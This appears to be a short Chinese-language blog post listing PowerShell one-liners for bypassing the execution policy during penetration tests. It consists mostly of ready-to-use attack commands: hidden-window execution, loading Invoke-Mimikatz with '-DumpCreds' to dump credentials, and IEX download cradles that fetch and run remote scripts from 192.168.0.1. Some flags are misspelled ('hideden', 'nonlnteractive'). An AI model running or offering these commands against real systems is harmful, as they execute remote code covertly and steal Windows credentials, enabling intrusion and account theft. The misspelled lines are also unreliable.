绕过Powershell执行策略执行ps脚本。

绕过Powershell执行策略执行ps脚本。

由于powershell默认是不允许执行ps脚本的* 管理员可以改为允许 *,但ps脚本又是渗透测试中非常有用也非常必要的工具,所以想办法绕过执行策略还是非常有必要的。

总结如下

  • 本地绕过权限执行.

    powershell -executionpolicy bypass -file xxx.ps1
  • 本地隐藏绕过权限执行.

    powershell -executionpolicy bypass -windowsstyle hideden -nologo -nonlnteractive -noprofile -file xxx.ps1
  • 本地导入ps1脚本,并执行函数.

    powershell.exe -exec bypass -Command "Import-Module C:\Invoke-Mimikatz.ps1";Invoke-Mimikatz -DumpCreds
  • 本地使用IEX下载远程ps1绕过执行.

    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.1/mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
  • 本地使用IEX下载远程ps1隐藏绕过权限执行.

    powershell -executionpolicy bypass -windowstyle hidden -nologo -noprofile IEX(new-object system.net.webclient).downloadstring("http://192.168.0.1/1025.ps1")    

    avatar